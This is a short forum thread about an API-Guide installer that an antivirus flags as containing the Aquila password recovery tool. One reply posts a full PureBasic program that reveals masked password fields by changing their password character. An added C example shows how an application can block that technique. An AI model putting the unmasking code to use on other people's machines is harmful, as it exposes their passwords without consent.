API-Guide v3.7x containing a password stealer???


Post by wings »

I downloaded the API-Guide from this web site: http://www.mentalis.org/agnet/apiguide.shtml

Every time I try to run the setup for the API-Guide, I get a message from PestPatrol saying that this exe contains Aquila 1.3.

PestPatrol says this about the "pest":

"Aquila is a multifunctional, easy-to-use password recovery tool. The following passwords can be recovered using Aquila: - Cached Windows passwords - Dial-up connections passwords - Passwords in codeword fields (****) - ICQ passwords, Versions 99b to 2000b."

Sounds scary or not?

Anyone know more about this?

(I already contacted the people behind this product but they didn't reply yet)

Post by Num3 »

Aquila does not work under NT, Win2k or XP, as it works on an exploit of Win9x. The password string was easily accessible through API calls, but that was corrected for NT-based OSes.

Someone wrote a snippet in PureBasic that does the same thing!

Here it is :lol:

Code:

; German forum: http://robsite.de/php/pureboard/viewtopic.php?t=906&highlight=
; 6. May 2003
; Author: Volker

; Klartext ("plain text")
;
; Changes the EM_SETPASSWORDCHAR property of a text field via the API,
; so that the password can be read in plain text.
; After starting, move the cursor over a password text field.
;
; 06.05.2003 Volker

#SWP_NOMOVE = $2
#SWP_NOSIZE = $1
#HWND_TOPMOST = -1
#HWND_NOTOPMOST = -2

#EM_SETPASSWORDCHAR = $CC

#Text1 = 1
#Label2 = 2

Global hwnd.l

Structure POINTAPI
  X.l
  Y.l
EndStructure


;///////////////////////////////////////////////////////////
Procedure getWindowUM()
;///////////////////////////////////////////////////////////
  Dim P.POINTAPI(1)
  lo.l
  str.s

  ; Read the cursor position
  GetCursorPos_(P(0))

  ; Find the window under the cursor
  lo = WindowFromPoint_(P(0)\X, P(0)\Y)

  ; Read the title (window text) into a buffer that really holds 100 characters
  str = Space(100)
  GetWindowText_(lo, str, 100)

  ; Show the result
  SetGadgetText(#Text1, str)

  ; Remove the password character
  SendMessage_(lo, #EM_SETPASSWORDCHAR, 0, "")

  Delay(10)

EndProcedure


;///////////////////////////////////////////////////////////
Procedure Open_Window()
;///////////////////////////////////////////////////////////
  hwnd = OpenWindow(#Label2, 352, 182, 270, 98, #PB_Window_MinimizeGadget | #PB_Window_SystemMenu | #PB_Window_SizeGadget | #PB_Window_TitleBar, "Klartext")
  If CreateGadgetList(WindowID())
    StringGadget(#Text1, 10, 10, 250, 30, "")
  EndIf
EndProcedure



;-Main ////////////////////////////////////////////////////////////////////////////////

Open_Window()

; Keep the form always on top
SetWindowPos_(hwnd, #HWND_TOPMOST, 0, 0, 0, 0, #SWP_NOMOVE | #SWP_NOSIZE)

Repeat
  Event = WaitWindowEvent()
  getWindowUM()
  Delay(10)
Until Event = #PB_EventCloseWindow
End
; ExecutableFormat=Windows
; EOF
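
A defensive counterpart to the snippet above, added here as an example and not part of the thread or of any poster's code: an application can subclass its own password edit control and refuse the messages that unmask or read it. The names pwd_should_drop, PwdSubclassProc and ProtectPasswordEdit are hypothetical, and using comctl32's SetWindowSubclass is an assumption about how the application is built.

```c
/* Added example: harden a Win32 password edit control against the
   message-based unmasking shown in the snippet above. */
#include <stdbool.h>

/* Message IDs from the Win32 headers, repeated so the policy compiles anywhere. */
enum { MSG_GETTEXT = 0x000D, MSG_GETTEXTLENGTH = 0x000E, MSG_SETPASSWORDCHAR = 0x00CC };

/* Hypothetical policy helper. cross_thread is the result of InSendMessage():
   true when the message was sent by another thread or process. */
bool pwd_should_drop(unsigned msg, bool cross_thread)
{
    switch (msg) {
    case MSG_SETPASSWORDCHAR:   /* masking is fixed at creation (ES_PASSWORD), */
        return true;            /* so nobody needs to change it afterwards     */
    case MSG_GETTEXT:
    case MSG_GETTEXTLENGTH:     /* our own UI thread may read the field,       */
        return cross_thread;    /* senders on other threads may not            */
    default:
        return false;
    }
}

#ifdef _WIN32
#include <windows.h>
#include <commctrl.h>           /* SetWindowSubclass; link with comctl32 */

static LRESULT CALLBACK PwdSubclassProc(HWND hwnd, UINT msg, WPARAM wp, LPARAM lp,
                                        UINT_PTR id, DWORD_PTR ref)
{
    (void)ref;
    if (pwd_should_drop(msg, InSendMessage() != 0))
        return 0;               /* swallow: text stays masked and unread */
    if (msg == WM_NCDESTROY)    /* detach cleanly when the control goes away */
        RemoveWindowSubclass(hwnd, PwdSubclassProc, id);
    return DefSubclassProc(hwnd, msg, wp, lp);
}

/* Call once, on the thread that owns the control, right after creating it. */
BOOL ProtectPasswordEdit(HWND hEdit)
{
    return SetWindowSubclass(hEdit, PwdSubclassProc, 1, 0);
}
#endif
```

Dropping cross-thread WM_GETTEXT also hides the field from assistive tools and from the application's own worker threads, so read the password on the UI thread only.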

Post by wings »

Thanks num3! :)